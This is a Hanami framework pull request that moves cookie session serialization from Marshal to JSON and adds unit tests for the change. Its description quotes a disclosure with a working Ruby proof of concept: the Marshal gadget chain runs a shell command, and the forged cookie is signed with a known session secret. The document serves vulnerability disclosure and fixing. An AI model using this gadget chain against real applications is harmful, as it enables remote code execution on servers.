### PR TITLE
Use JSON serializer for Cookie HTTP sessions store

### DIFF
--- a/lib/hanami/config/sessions.rb
+++ b/lib/hanami/config/sessions.rb
@@ -33,6 +33,7 @@ module Hanami
       # @api private
       #
       # @see http://www.rubydoc.info/github/rack/rack/Rack/Session/Abstract/ID
+      # @see https://www.rubydoc.info/github/rack/rack/Rack/Session/Cookie
       def initialize(adapter = nil, options = {}, configuration = nil)
         @adapter       = adapter
         @options       = options
@@ -77,11 +78,17 @@ module Hanami
       # @since 0.2.0
       # @api private
       def default_options
-        if @configuration
+        result = if @configuration
           { domain: domain, secure: @configuration.ssl? }
         else
           {}
         end
+
+        if s = cookies_adapter_serializer
+          result[:coder] = s
+        end
+
+        result
       end
 
       # @since 0.2.0
@@ -97,6 +104,15 @@ module Hanami
       # @api private
       def ip_address?(string)
         !!IPAddr.new(string) rescue false
+      end
+
+      # @since 1.3.5
+      # @api private
+      def cookies_adapter_serializer
+        return nil unless @adapter == :cookie
+
+        require "rack/session/cookie"
+        Rack::Session::Cookie::Base64::JSON.new
       end
     end
   end

--- a/spec/unit/hanami/config/sessions_spec.rb
+++ b/spec/unit/hanami/config/sessions_spec.rb
@@ -1,0 +1,61 @@
+require "spec_helper"
+require "ostruct"
+
+RSpec.describe Hanami::Config::Sessions do
+  describe "#initialize" do
+    it "returns an instance of #{described_class}" do
+      expect(subject).to be_kind_of(described_class)
+    end
+  end
+
+  describe "#enabled?" do
+    it "is false by default" do
+      expect(subject.enabled?).to be(false)
+    end
+
+    it "is true when adapter is present" do
+      subject = described_class.new(:cookie)
+      expect(subject.enabled?).to be(true)
+    end
+  end
+
+  describe "#middleware" do
+    it "returns Rack sessions middleware and options" do
+      subject = described_class.new(:redis)
+
+      rack_middleware_class, options = subject.middleware
+      expect(rack_middleware_class).to eq("Rack::Session::Redis")
+      expect(options).to match({})
+    end
+
+    it "returns custom options for the middleware" do
+      subject = described_class.new(:redis, opts = { redis_server: "redis://redis:6379/0" })
+
+      _, options = subject.middleware
+      expect(options).to match(opts)
+    end
+
+    it "returns default serializer for Cookie storage" do
+      subject = described_class.new(:cookie)
+
+      rack_middleware_class, options = subject.middleware
+      expect(rack_middleware_class).to eq("Rack::Session::Cookie")
+      expect(options).to match(coder: an_instance_of(Rack::Session::Cookie::Base64::JSON))
+    end
+
+    it "allows to override default serializer for Cookie storage" do
+      subject = described_class.new(:cookie, coder: coder = Object.new)
+
+      _, options = subject.middleware
+      expect(options).to match(coder: coder)
+    end
+
+    it "sets domain and secure settings from configuration" do
+      configuration = OpenStruct.new(host: domain = "hanamirb.test", ssl?: ssl = true)
+      subject = described_class.new(:redis, {}, configuration)
+
+      _, options = subject.middleware
+      expect(options).to match(domain: domain, secure: ssl)
+    end
+  end
+end


### PR DESCRIPTION
## Security threat

We received an anonymous report of a security threat that needs to be addressed. Thanks `ooooooo_q`.

> For Marshal serialization, RCE using the rubygems class has been discovered.
https://devcraft.io/2021/01/07/universal-deserialisation-gadget-for-ruby-2-x-3-x.html
>
> Actually, there is no danger if the value of `WEB_SESSIONS_SECRET` is not leaked, but since the file of `.env.development` is committed without being ignored on git, if the code is published in the OSS repository etc., An attacker may be able to know the values set in the development environment.
>
> An attacker can use DNS rebinding or multiple subdomains to inject a cookie into a request to a local server when a user running the application visits the trap site.
>
> I think it's safe to assign a random value like sinatra or change it to JSON as the default serializer.
>
> This is a sample to create a cookie value.

```ruby
# Universal Deserialisation Gadget for Ruby 2.x-3.x
# https://devcraft.io/2021/01/07/universal-deserialisation-gadget-for-ruby-2-x-3-x.html

# Autoload the required classes
Gem::SpecFetcher
Gem::Installer

# prevent the payload from running when we Marshal.dump it
module Gem
  class Requirement
    def marshal_dump
      [@requirements]
    end
  end
end

wa1 = Net::WriteAdapter.new(Kernel, :system)

rs = Gem::RequestSet.allocate
rs.instance_variable_set('@sets', wa1)
rs.instance_variable_set('@git_set', "id") # `id` is executed in shell

wa2 = Net::WriteAdapter.new(rs, :resolve)

i = Gem::Package::TarReader::Entry.allocate
i.instance_variable_set('@read', 0)
i.instance_variable_set('@header', "aaa")


n = Net::BufferedIO.allocate
n.instance_variable_set('@io', i)
n.instance_variable_set('@debug_output', wa2)

t = Gem::Package::TarReader.allocate
t.instance_variable_set('@io', n)

r = Gem::Requirement.allocate
r.instance_variable_set('@requirements', t)

require 'rack'
require 'delegate'

def generate_hmac(data, secret)
  OpenSSL::HMAC.hexdigest("SHA1", secret, data)
end

WEB_SESSIONS_SECRET="b2c818b553cc0f219494ad3e1869e3aa79208bf0d8e52a1ab6fe6d4cd8dbe9af"  encoded = Rack::Session::Cookie::Base64::Marshal.new.encode([Gem::SpecFetcher, Gem::Installer, r])
signature = generate_hmac(encoded, WEB_SESSIONS_SECRET)

puts "#{encoded}--#{signature}"
```

## Security Countermeasure

The default serializer for `:cookie` session storage is `Rack::Session::Cookie::Base64::JSON`, which is NOT vulnerable to this security threat.

## How to migrate your application

When Hanami `1.3.5` will be released:

1. Update `Gemfile`
2. Rotate the session secret in production. This will cause an expiration of current HTTP sessions. This is needed because you're going to change the low level (de)serialization mechanism of HTTP sessions.
3. Deploy the app

---

Huge thanks goes to @mensfeld for helping me in the process. 💯 🙏 